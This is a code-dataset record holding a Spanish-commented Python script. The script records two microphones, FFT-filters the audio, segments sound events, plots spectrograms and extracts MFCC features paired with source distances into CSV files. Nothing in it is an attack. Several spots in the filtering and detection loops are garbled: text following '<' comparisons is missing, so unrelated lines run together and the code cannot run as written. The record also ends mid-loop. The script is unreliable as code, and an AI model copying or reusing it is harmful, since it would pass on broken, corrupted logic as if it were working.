"line_number": 22, "usage_type": "name"}, {"api_name": "os.fork", "line_number": 27, "usage_type": "call"}, {"api_name": "utils.utils.clear", "line_number": 29, "usage_type": "call"}, {"api_name": "os.wait", "line_number": 35, "usage_type": "call"}, {"api_name": "utils.crypto.decrypt", "line_number": 43, "usage_type": "call"}, {"api_name": "socket.error", "line_number": 45, "usage_type": "name"}, {"api_name": "sys.stderr.write", "line_number": 46, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 46, "usage_type": "name"}, {"api_name": "utils.utils.clear", "line_number": 61, "usage_type": "call"}, {"api_name": "utils.utils.clear", "line_number": 72, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 73, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 92, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 92, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "27563142870", "text": "from python_speech_features import mfcc\nfrom python_speech_features import logfbank\nfrom python_speech_features import fbank\nfrom scipy import signal as sg\nimport librosa\nimport scipy.io.wavfile as wav\nfrom pyAudioAnalysis import audioFeatureExtraction\nimport os.path as path\nimport sounddevice as sd\nimport threading\nfrom csv import reader\nfrom multiprocessing import Process\nimport time\nfrom scipy.io import wavfile\nimport sounddevice as sd\nimport soundfile as sf\nimport time\nfrom pydub import AudioSegment\nfrom pydub import AudioSegment, silence\nimport wave\nimport numpy as np\nimport warnings\nimport gc\nfrom scipy import fftpack\nimport pylab as plt\nimport warnings\nimport datetime\nimport pandas as pd\nimport csv\nfrom scipy.signal import fftconvolve\nfrom scipy.signal import convolve\nimport pandas as pd\n#import ray\n#ray.init()\n\nwarnings.simplefilter(\"ignore\", DeprecationWarning)\n\n#############################################3\n\ndef show(data, data2):\n import numpy as np\n import wave\n import pylab as plt\n import random\n import struct\n warnings.simplefilter(\"ignore\", DeprecationWarning)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n plt.figure(1)\n time = np.linspace(0, len(signal) / fs, num=len(signal))\n time2= np.linspace(0, len(signal2) / fs, num=len(signal2))\n a = plt.subplot(211)\n plt.plot(time, signal ,label='señal 1')\n plt.plot(time2, signal2 ,label='señal 2')\n plt.xlabel('Tiempo') # Colocamos la etiqueta para el eje x\n plt.ylabel('Amplitud (unidad desconocida)') # Colocamos la etiqueta para el eje y\n a.legend()\n a.set_ylim([-4000, 4000])\n b= plt.subplot(212)\n plt.plot(time2, signal2, label='señal2')\n plt.plot(time, signal,label='señal 1')\n plt.xlabel('Tiempo') # Colocamos la etiqueta para el eje x\n plt.ylabel('Amplitud (unidad desconocida)') # Colocamos la etiqueta para el eje y\n b.legend()\n b.set_ylim([-4000, 4000])\n plt.show()\n\n#derecha\n#@ray.remote\ndef ejecutar_doc1(tiempo):\n print(\"ejecuto 1\")\n fs = 44100\n sd.default.samplerate = fs\n # print(fs)\n sd.default.channels = 1\n # derecho\n sd.default.device = (3,None)\n duration = 4\n value=duration * fs\n myrecording = sd.rec(int(value), samplerate=fs, channels=(1))\n sd.wait()\n print(\"grabando1\")\n sd.stop()\n print(\"grabado1\")\n sf.write('1_{}.wav'.format(tiempo), myrecording, fs)\n#izquierda\n#@ray.remote\ndef ejecutar_doc2(tiempo):\n print(\"ejecuto 2\")\n fs = 44100\n sd.default.samplerate = fs\n # print(fs)\n sd.default.channels = 1\n duration = 4\n sd.default.device = (4,None)\n value2= duration * fs\n myrecording2 = sd.rec(int(value2), samplerate=fs, channels=(1))\n sd.wait()\n print(\"grabando2\")\n sd.stop()\n print(\"grabado1\")\n sf.write('2_{}.wav'.format(tiempo), myrecording2, fs)\n\ndef sonidos_detectados():\n myaudio = AudioSegment.from_wav(\"a1.wav\")\n myaudio2 = AudioSegment.from_wav(\"b1.wav\")\n silencio = silence.detect_nonsilent(myaudio, min_silence_len=1, silence_thresh=-32)\n silencio2 = silence.detect_nonsilent(myaudio2, min_silence_len=1, silence_thresh=-32)\n print(len(silencio))\n\nif __name__ == '__main__':\n if (path.exists('nombres_diferencias.csv'))==False:\n print(\"Generando archivos necesarios\")\n df = pd.DataFrame(columns=['nombres', 'distancias'])\n df.to_csv('nombres_diferencias.csv')\n if (path.exists('nombres_individuales.csv')) == False:\n print(\"Generando archivos necesarios\")\n df = pd.DataFrame(columns=['nombres','distancias'])\n df.to_csv('nombres_individuales.csv')\n if (path.exists('nombres_valores.csv')) == False:\n print(\"Generando archivos necesarios\")\n df = pd.DataFrame(columns=[''])\n df.to_csv('nombres_valores.csv')\n if (path.exists('mfcc.csv')) == False:\n print(\"Generando archivos necesarios\")\n df = pd.DataFrame(columns=[''])\n df.to_csv('mfcc.csv')\n aux = False\n options = [1,2,3,4,5,6,7,8,88,89,9,10,11]\n de=6\n iz=7\n distancias=[0.5 ,1 ,1.5 ,2 ,2.5 ,3 ,3.5 ,4 ,4.5,5]\n a=b=c=d=e=f=g=h=i=j=\"0\"\n while (aux==False):\n distancia = 0.\n warnings.simplefilter(\"ignore\", DeprecationWarning)\n fs = 22050\n sd.default.samplerate = fs\n # print(fs)\n sd.default.channels = 1\n duration = 2\n print(\"1-Grabar\")\n print(\"2-Ver señales \")\n print(\"3-ver fft y dispositivos\")\n print(\"4-FFT\")\n print(\"5-Ver señales transformadas\")\n print(\"6-detectar sonidos\")\n print(\"\")\n print(\"88- csv\")\n print(\"\")\n print(\"\")\n print(\"10-salir\")\n\n error = True\n while error ==True:\n try:\n option = int(input())\n print(\"opcion: \", option)\n error = False\n except ValueError:\n print(\"1-Grabar\")\n print(\"2-Ver señales \")\n print(\"3-ver fft y dispositivos\")\n print(\"4-FFT\")\n print(\"5-Ver señales transformadas\")\n print(\"6-detectar sonidos\")\n print(\"\")\n print(\"88- csv\")\n print(\"\")\n print(\"\")\n print(\"10-salir\")\n\n if option in options:\n\n\n if (option==1):\n print(\"ingrese cantidad de repeteciones\")\n cantidad =1\n\n distancia=-1\n while (distancia > 500 or distancia < 0):\n print(\"ingrese la distancia en centimetros\")\n distancia=int(input())\n\n i=0\n valores=[]\n contador = 0\n df = pd.read_csv(\"nombres_diferencias.csv\", usecols=(\"nombres\", \"distancias\"), dtype=str)\n\n while i < cantidad:\n\n tiempo = int(time.time() )\n p1 = Process(target=ejecutar_doc1, args=(tiempo,))\n p1.start()\n p2 = Process(target=ejecutar_doc2, args=(tiempo,))\n p2.start()\n p1.join()\n p2.join()\n i= i+1\n time.sleep(1)\n valores.append([tiempo, distancia])\n df1 = pd.DataFrame(valores, columns=(\"nombres\", \"distancias\"))\n print(\"hey\")\n df = df.append(df1, ignore_index=True)\n print(df)\n df.to_csv(\"nombres_diferencias.csv\")\n input()\n if (option == 2):\n a= pd.read_csv('nombres_diferencias.csv')\n valores = a['nombres']\n for i in range(len(valores)):\n uno=str(\"1_\"+str(valores[i])+\".wav\")\n dos=str(\"2_\"+str(valores[i])+\".wav\")\n\n print(uno,dos)\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n show(signal, signal2)\n print(\"presiona enter para continuar\")\n input()\n if option == 3:\n print(sd.query_devices())\n a = pd.read_csv('nombres_diferencias.csv')\n valores = a['nombres']\n #print(\"ingrese frecuencia\")\n #frec=int(input())\n for i in range(len(valores)):\n uno = str(\"1_\" + str(valores[i]) + \".wav\")\n dos = str(\"2_\" + str(valores[i]) + \".wav\")\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n W = np.fft.fftfreq(len(signal))*44100\n val=W\n fft_signal = np.fft.fft(signal)\n fft_theo=(2.0*np.abs(fft_signal/len(signal)))\n cut_f_signal = fft_signal.copy()\n #PARA VER FRECUENCIA DE SONIDO FFT\n plt.plot((W), (((cut_f_signal)/44100)))\n print(cut_f_signal/44100)\n plt.xlabel('Frecuencia Hz') # Colocamos la etiqueta para el eje x\n plt.ylabel('Cantidad de muestras') # Colocamos la etiqueta para el eje y\n\n\n axes = plt.gca()\n\n axes.set_xlim([0,500])\n\n plt.show()\n print(\"presiona enter para continuar\")\n input()\n if option == 4:\n a = pd.read_csv('nombres_diferencias.csv')\n valores = a['nombres']\n print(\"ingrese frecuencia\")\n frec=int(input())\n for i in range(len(valores)):\n uno = str(\"1_\" + str(valores[i]) + \".wav\")\n\n dos = str(\"2_\" + str(valores[i]) + \".wav\")\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n print(len(signal))\n\n W = np.fft.fftfreq(len(signal))*44100\n val=W\n fft_signal = np.fft.fft(signal)\n fft_theo=(2.0*np.abs(fft_signal/len(signal)))\n cut_f_signal = fft_signal.copy()\n # PARA VER FRECUENCIA DE SONIDO FFT\n #plt.plot(W,cut_f_signal)\n #plt.show()\n a=frec-5\n b=frec+5\n for i in range(0,len(W)):\n if((W[i]<-b) or (W[i])>b):\n cut_f_signal[[i]]=0\n else:\n if((W[i]>-a) and (W[i] 0\n fft_signal = np.fft.fft(signal)\n cut_f_signal = fft_signal.copy()\n a=frec-10\n b=frec+10\n for i in range(0,len(W)):\n if((W[i]<-b) or (W[i])>b):\n cut_f_signal[[i]]=0\n else:\n if((W[i]>-a) and (W[i] 0.006)] = 0\n final = np.fft.ifft(cut_f_signal)\n final = final.astype('int16')\n for inicio in range(0, 1000):\n final[inicio] = 10\n for fin in range(len(signal) - 1000, len(signal)):\n final[fin] = 10\n wavfile.write('fft_{}'.format(dos), 44100, final)\n if option==5:\n a = pd.read_csv('nombres_diferencias.csv')\n valores = a['nombres']\n for i in range(len(valores)):\n uno = str(\"fft_1_\" + str(valores[i]) + \".wav\")\n dos = str(\"fft_2_\" + str(valores[i]) + \".wav\")\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n show(signal,signal2)\n ''' ESPECTROGRAMA\n\n (rate1, sig1) = wav.read(uno)\n (rate2, sig2) = wav.read(dos)\n f, t, Sxx = sg.spectrogram(signal, rate1, nperseg=441)\n f2, t2, Sxx2 = sg.spectrogram(signal2, rate2, nperseg=441)\n a = plt.subplot(211)\n plt.pcolor(t, f, Sxx, vmin=0, vmax=2000, cmap='gist_earth')\n axes = plt.gca()\n axes.set_ylim([-100, 7000])\n plt.ylabel('Frecuencia [Hz]')\n plt.xlabel('Tiempo [sec]')\n b = plt.subplot(212)\n plt.pcolor(t2, f2, Sxx2, vmin=0, vmax=2000, cmap='gist_earth')\n axes = plt.gca()\n axes.set_ylim([-100, 7000])\n plt.ylabel('Frecuencia [Hz]')\n plt.xlabel('Tiempo [sec]')\n plt.show()\n '''\n print(\"presiona enter para continuar\")\n input()\n if (option==6):\n a = pd.read_csv('nombres_diferencias.csv')\n valores = a['nombres']\n distancia = a['distancias']\n dif1 = \"\"\n cont = 0\n print(\"ingrese duracion del sonido ej: 0.1\")\n dur = float(input())\n dur2 = dur\n dur = int(dur/0.1)\n #a = int(input())\n\n cont_name = 0\n\n b = pd.read_csv('nombres_individuales.csv')\n name_csv = []\n dif_csv = []\n df1 = pd.DataFrame([], columns=['nombres', 'distancias'])\n for i in range(len(valores)):\n #print(\"sonido? a)alto b)bajo\")\n\n #mx = str(input())\n mx = \"a\"\n if mx == \"a\":\n maximo = 2004730\n else:\n maximo = 68000\n uno = str(\"fft_1_\" + str(valores[i]) + \".wav\")\n dos = str(\"fft_2_\" + str(valores[i]) + \".wav\")\n print(\"nombres de los archivos: \", uno, dos)\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n muestra = []\n aux = 0\n suma_ant = 0\n suma_ant2 = 0\n contador=0\n\n for j in range(0,len(signal)-int(4410*dur),int(4410*dur)):\n suma = 0\n suma2 = 0\n\n for x in range(0,4410*dur):\n suma=np.abs(suma)+np.abs(signal[j+x])\n suma2=np.abs(suma2)+np.abs(signal2[j+x])\n print(\"-\")\n\n print(suma/100000)\n print(suma_ant/100000)\n\n print(suma2/100000)\n print(suma_ant2/100000)\n\n print(maximo/100000)\n print(\"-\")\n if((suma > maximo) and (suma_ant > suma)):\n print(\"ooeeeeee\")\n if ((suma2 > maximo) and (suma_ant2 >suma2 )):\n print(\"Aaaa\")\n if ( (((suma > maximo) and (suma_ant < suma)) or ((suma2 > maximo) and (suma_ant2 0) )):\n for m in range((muestra[valor])-dur*4410, (muestra[valor]+dur*4410), dur*441):\n print(\"oe\")\n center= 0\n center2=0\n for n in range (0,dur*441):\n center=np.abs(center)+np.abs(signal[m+n])\n center2=np.abs(center2)+np.abs(signal2[m+n])\n\n\n print(center)\n tiempo = ((muestra[valor]) -9700)\n tiempo2 = ((muestra[valor]) + 5000)\n if (tiempo>0 and tiempo2>0):\n tiempo_med=np.max(signal[tiempo:tiempo2])\n tiempo_med2=np.max(signal2[tiempo:tiempo2])\n if(tiempo_med >= tiempo_med2 ):\n signal3 = signal[tiempo:tiempo2].tolist()\n c = signal3.index(tiempo_med)\n tiempo2 = tiempo + c +(4500)\n tiempo = tiempo +c -(3000)\n\n if tiempo_med2>tiempo_med:\n signal3=signal2[tiempo:tiempo2].tolist()\n c=signal3.index(tiempo_med2)\n tiempo2 = tiempo + c +(4500)\n tiempo=tiempo+ c -(3000)\n\n tiempo = tiempo/44.1\n tiempo2 = tiempo2/44.1\n t1 = tiempo - 100 * dur2 *10\n t2 = tiempo2 + 60 * dur2*10\n t3 = tiempo - 100 *dur2*10\n t4 = tiempo2 + 60 *dur2*10\n newAudio = AudioSegment.from_wav(uno)\n newAudio = newAudio[t1:t2]\n name = str(cont_name)\n dif1 = str(distancia[i])\n newAudio.export('{}.a.wav'.format(name), format=\"wav\")\n newAudio = AudioSegment.from_wav(dos)\n newAudio = newAudio[t3:t4]\n newAudio.export('{}.b.wav'.format(name), format=\"wav\")\n name1 = (str(cont_name) + \".a\")\n name_csv.append([name1, dif1])\n name2 = (str(cont_name) + \".b\")\n name_csv.append([name2, dif1])\n cont_name = cont_name + 1\n\n\n\n\n if(((((muestra[valor]) / 44.1) - 441 / 2) >0 and valor!=0 and valor!=len(muestra) and (((muestra[valor]-muestra[valor-1*dur]>(4410*2 ))and (muestra[valor+1]-muestra[valor]>(4410*3)))or muestra[valor-1]==0))):\n for m in range((muestra[valor])-dur*4410, (muestra[valor]+dur*4410), dur*441):\n\n print(\"oe\")\n center= 0\n center2=0\n for n in range (0,dur*441):\n center=np.abs(center)+np.abs(signal[m+n])\n center2=np.abs(center2)+np.abs(signal2[m+n])\n\n print(center)\n tiempo = ((muestra[valor]) -9700)\n tiempo2 = ((muestra[valor]) + 5000)\n if (tiempo>0 and tiempo2>0):\n tiempo_med=np.max(signal[tiempo:tiempo2])\n tiempo_med2=np.max(signal2[tiempo:tiempo2])\n\n\n\n\n\n if(tiempo_med >= tiempo_med2 ):\n signal3 = signal[tiempo:tiempo2].tolist()\n c = signal3.index(tiempo_med)\n tiempo2 = tiempo + c +(4500)\n tiempo = tiempo +c -(3000)\n\n if tiempo_med2>tiempo_med:\n signal3=signal2[tiempo:tiempo2].tolist()\n c=signal3.index(tiempo_med2)\n tiempo2 = tiempo + c +(4500)\n tiempo=tiempo+ c -(3000)\n\n tiempo = tiempo/44.1\n tiempo2 = tiempo2/44.1\n t1 = tiempo - 100 * dur2 *10\n t2 = tiempo2 + 60 * dur2*10\n t3 = tiempo - 100 *dur2*10\n t4 = tiempo2 + 60 *dur2*10\n newAudio = AudioSegment.from_wav(uno)\n newAudio = newAudio[t1:t2]\n name = str(cont_name)\n dif1 = str(distancia[i])\n newAudio.export('{}.a.wav'.format(name), format=\"wav\")\n newAudio = AudioSegment.from_wav(dos)\n newAudio = newAudio[t3:t4]\n newAudio.export('{}.b.wav'.format(name), format=\"wav\")\n name1 = (str(cont_name) + \".a\")\n name_csv.append([name1, dif1])\n name2 = (str(cont_name) + \".b\")\n name_csv.append([name2, dif1])\n cont_name = cont_name + 1\n df1 =pd.DataFrame(name_csv, columns=(\"nombres\",\"distancias\"))\n df1.to_csv(\"nombres_individuales.csv\")\n\n if option==7:\n a = pd.read_csv('nombres_individuales.csv')\n valores = a['nombres']\n for i in range(0,len(valores),2):\n uno = str(str(valores[i])+\".wav\")\n #print(uno)\n dos = str(str(valores[i+1])+\".wav\")\n #print(dos)\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n plt.subplot(211)\n plt.title(str(valores[i]))\n plt.plot(signal)\n plt.plot(signal2)\n axes = plt.gca()\n plt.subplot(212)\n plt.title(str(valores[i+1]))\n plt.plot(signal2)\n plt.plot(signal)\n axes = plt.gca()\n plt.show()\n\n if option==8:\n a = pd.read_csv('nombres_individuales.csv')\n valores = a['nombres']\n for i in range(0,len(valores),2):\n uno = str(str(valores[i])+\".wav\")\n #print(uno)\n dos = str(str(valores[i+1])+\".wav\")\n #print(dos)\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n f, t, Sxx = sg.spectrogram(signal, fs, nperseg=441)\n\n plt.pcolormesh(t, f, Sxx)\n axes = plt.gca()\n axes.set_ylim([200, 2050])\n plt.ylabel('Frecuencia [Hz]')\n plt.xlabel('Tiempo [sec]')\n plt.show()\n f2, t2, Sxx2 = sg.spectrogram(signal2, fs, nperseg=441)\n\n plt.pcolormesh(t2, f2, Sxx2)\n axes = plt.gca()\n axes.set_ylim([200, 2050])\n plt.ylabel('Frecuencia [Hz]')\n plt.xlabel('Tiempo [sec]')\n plt.show()\n\n if option == 9:\n a = pd.read_csv('nombres_individuales.csv')\n valores = a['nombres']\n for i in range(0, len(valores), 2):\n uno = str(str(valores[i]) + \".wav\")\n print(uno)\n dos = str(str(valores[i + 1]) + \".wav\")\n print(dos)\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n\n plt.subplot(211)\n plt.title(\"señales\")\n\n plt.plot(signal)\n plt.plot(signal2)\n\n # axes = plt.gca()\n # axes.set_ylim([-700, 700])\n\n\n # axes = plt.gca()\n # axes.set_ylim([-700, 700])\n plt.subplot(212)\n plt.title('Convolve')\n\n x= fftconvolve(signal,signal2,\"same\")\n plt.plot(x)\n plt.show()\n if option==88:\n print(\"cual?\")\n ingresado=input()\n a = pd.read_csv('nombres_individuales.csv')\n print(a)\n valores = a['nombres']\n valores_csv = []\n distancia =a['distancias']\n #print(distancia)\n #print(len(valores))\n #for i in range(0, int(len(valores)),2):\n for i in range(0, int(len(valores)),2):\n\n dis=int(distancia[i]/10)*10\n string= int(distancia[i])\n array = np.zeros(50,dtype=int)\n array[int(string/10)]=1\n\n\n uno = str(str(valores[i])+\".wav\")\n dos = str(str(valores[i+1]) + \".wav\")\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n #print(signal)\n #print(signal2)\n\n #plt.plot(signal)\n #plt.plot(signal2)\n #plt.show()\n #convolve = fftconvolve(signal, signal2, \"same\") / 10\n #convolve = np.round(convolve)\n #print(len(convolve))\n #if len(convolve)<9041:\n # np.append(convolve,[0])\n\n #opcion 1\n \"\"\"\n if np.max(signal) < np.max(signal2):\n signal_mayor = signal\n else:\n signal_mayor = signal2\n \"\"\"\n #opcion 2\n signal_mayor = fftconvolve(signal, signal2, \"same\")\n signal_mayor = np.round(signal_mayor)\n\n diferencia=np.max(signal)-np.max(signal2)\n\n prim = []\n prim2 = []\n prim3 = []\n prim4 = []\n prim5 = []\n prim6 = []\n prim7 = []\n prim8 = []\n prim9 = []\n prim10 = []\n prim11 = []\n prim12 = []\n prim13 = []\n prim14 = []\n prim15 = []\n prim16 = []\n prim17 = []\n prim18 = []\n prim19 = []\n prim20 = []\n prim21 = []\n prim22 = []\n prim23 = []\n prim24 = []\n prim25 = []\n prim26 = []\n prim27 = []\n prim28 = []\n prim29 = []\n prim30= []\n print(\"size original\", len(signal))\n for x in range(0, len(signal)-29, 30):\n prim.append(int(signal_mayor[x]))\n prim2.append(int(signal_mayor[x+1]))\n prim3.append(int(signal_mayor[x+2]))\n prim4.append(int(signal_mayor[x+3]))\n prim5.append(int(signal_mayor[x+4]))\n prim6.append(int(signal_mayor[x+5]))\n prim7.append(int(signal_mayor[x+6]))\n prim8.append(int(signal_mayor[x+7]))\n prim9.append(int(signal_mayor[x+8]))\n prim10.append(int(signal_mayor[x+9]))\n prim11.append(int(signal_mayor[x+10]))\n prim12.append(int(signal_mayor[x+11]))\n prim13.append(int(signal_mayor[x+12]))\n prim14.append(int(signal_mayor[x+13]))\n prim15.append(int(signal_mayor[x+14]))\n prim16.append(int(signal_mayor[x+15]))\n prim17.append(int(signal_mayor[x+16]))\n prim18.append(int(signal_mayor[x+17]))\n prim19.append(int(signal_mayor[x+18]))\n prim20.append(int(signal_mayor[x+19]))\n prim22.append(int(signal_mayor[x + 21]))\n prim21.append(int(signal_mayor[x+20]))\n prim23.append(int(signal_mayor[x + 22]))\n prim24.append(int(signal_mayor[x + 23]))\n prim25.append(int(signal_mayor[x + 24]))\n prim26.append(int(signal_mayor[x + 25]))\n prim27.append(int(signal_mayor[x + 26]))\n prim28.append(int(signal_mayor[x + 27]))\n prim29.append(int(signal_mayor[x + 28]))\n prim30.append(int(signal_mayor[x + 29]))\n plt.plot(prim)\n plt.show()\n prim=((mfcc(np.asarray(prim[0:len(prim)]), int(1000*np.log10(len(signal))), nfft=1103)*10).astype(int)).transpose().tolist()\n plt.plot(prim[0])\n plt.show()\n prim2=((mfcc(np.asarray(prim2[0:len(prim2)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim3=((mfcc(np.asarray(prim3[0:len(prim3)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim4=((mfcc(np.asarray(prim4[0:len(prim4)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim5=((mfcc(np.asarray(prim5[0:len(prim5)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim6=((mfcc(np.asarray(prim6[0:len(prim6)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim7=((mfcc(np.asarray(prim7[0:len(prim7)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim8=((mfcc(np.asarray(prim8[0:len(prim8)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim9=((mfcc(np.asarray(prim9[0:len(prim9)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim10=((mfcc(np.asarray(prim10[0:len(prim10)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim12=((mfcc(np.asarray(prim12[0:len(prim12)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim13=((mfcc(np.asarray(prim13[0:len(prim13)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim11=((mfcc(np.asarray(prim11[0:len(prim11)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim14=((mfcc(np.asarray(prim14[0:len(prim14)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim15=((mfcc(np.asarray(prim15[0:len(prim15)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim16=((mfcc(np.asarray(prim16[0:len(prim16)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim17=((mfcc(np.asarray(prim17[0:len(prim17)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim18=((mfcc(np.asarray(prim18[0:len(prim18)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim19=((mfcc(np.asarray(prim19[0:len(prim19)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim20=((mfcc(np.asarray(prim20[0:len(prim20)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim21=((mfcc(np.asarray(prim21[0:len(prim21)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim22=((mfcc(np.asarray(prim22[0:len(prim22)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim23=((mfcc(np.asarray(prim23[0:len(prim23)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim24=((mfcc(np.asarray(prim24[0:len(prim24)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim25=((mfcc(np.asarray(prim25[0:len(prim25)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim26=((mfcc(np.asarray(prim26[0:len(prim26)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim27=((mfcc(np.asarray(prim27[0:len(prim27)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim28=((mfcc(np.asarray(prim28[0:len(prim28)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim29=((mfcc(np.asarray(prim29[0:len(prim29)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim30=((mfcc(np.asarray(prim30[0:len(prim30)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n\n prim = prim[0]\n prim2 = prim2[0]\n prim3 = prim3[0]\n prim4 = prim4[0]\n prim5 = prim5[0]\n prim6 = prim6[0]\n prim7 = prim7[0]\n prim8 = prim8[0]\n prim9 = prim9[0]\n prim10 = prim10[0]\n prim11 = prim11[0]\n prim12 = prim12[0]\n prim13 = prim13[0]\n prim14 = prim14[0]\n prim15 = prim15[0]\n prim16 = prim16[0]\n prim17 = prim17[0]\n prim18 = prim18[0]\n prim19 = prim19[0]\n prim20 = prim20[0]\n prim21 = prim21[0]\n prim22 = prim22[0]\n prim23 = prim23[0]\n prim24 = prim24[0]\n prim25 = prim25[0]\n prim26 = prim26[0]\n prim27 = prim27[0]\n prim28 = prim28[0]\n prim29 = prim29[0]\n prim30 = prim30[0]\n\n prim.append(diferencia)\n prim2.append(diferencia)\n prim3.append(diferencia)\n prim4.append(diferencia)\n prim5.append(diferencia)\n prim6.append(diferencia)\n prim7.append(diferencia)\n prim8.append(diferencia)\n prim9.append(diferencia)\n prim10.append(diferencia)\n prim11.append(diferencia)\n prim12.append(diferencia)\n prim13.append(diferencia)\n prim14.append(diferencia)\n prim15.append(diferencia)\n prim16.append(diferencia)\n prim17.append(diferencia)\n prim18.append(diferencia)\n prim19.append(diferencia)\n prim20.append(diferencia)\n prim21.append(diferencia)\n prim22.append(diferencia)\n prim23.append(diferencia)\n prim24.append(diferencia)\n prim25.append(diferencia)\n prim26.append(diferencia)\n prim27.append(diferencia)\n prim28.append(diferencia)\n prim29.append(diferencia)\n prim30.append(diferencia)\n\n\n if ingresado == \"b\":\n prim.append(dis)\n prim2.append(dis)\n prim3.append(dis)\n prim4.append(dis)\n prim5.append(dis)\n prim6.append(dis)\n prim7.append(dis)\n prim8.append(dis)\n prim9.append(dis)\n prim10.append(dis)\n prim11.append(dis)\n prim12.append(dis)\n prim13.append(dis)\n prim14.append(dis)\n prim15.append(dis)\n prim16.append(dis)\n prim17.append(dis)\n prim18.append(dis)\n prim19.append(dis)\n prim20.append(dis)\n prim21.append(dis)\n prim22.append(dis)\n prim23.append(dis)\n prim24.append(dis)\n prim25.append(dis)\n prim26.append(dis)\n prim27.append(dis)\n prim28.append(dis)\n prim29.append(dis)\n prim30.append(dis)\n\n if ingresado == \"a\":\n for z in range(0,20):\n 